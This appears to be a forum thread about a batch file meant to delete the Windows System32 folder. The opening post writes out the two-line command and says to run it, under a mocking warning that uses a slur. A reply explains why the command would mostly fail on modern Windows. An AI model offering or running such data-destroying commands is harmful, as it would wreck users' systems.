DO NOT TRY THIS, I REPEAT DO NOT TRY THIS [unless you are a retard]

We all know that deleting system 32 the usual way wont work but theres a code to do it

you need to open notepad and type:

@echo off
del c:\WINDOWS\system32

then save as anything.bat

and run it.

People say it deletes your system 32 but is it really true? What happens when it gets deleted? Is it just possible to reinstall windows and get everything normal?

Nope. AFAIK "del" won't even work for folders, it only works for files; for folders, you need to use "rd [foldername]" command. Also, even the RD command won't work unless the folder is empty. Even if you try to delete the contents of the folder using wildcards (e.g. "del *.*") hidden and system files will be left behind - you need to manually change the attributes to allow deleting them in the first place. Trust me, it's not that easy, but it's still possible to create a batch that deletes all contents of the folder as well as the folder itself - though NT-based windows...es (plural for plural?) are quite secure, it's not possible to do this without the user noticing. AFAIK this trick will only work for Windows ME & older OSs.

Windows = screwed over.

Yes.
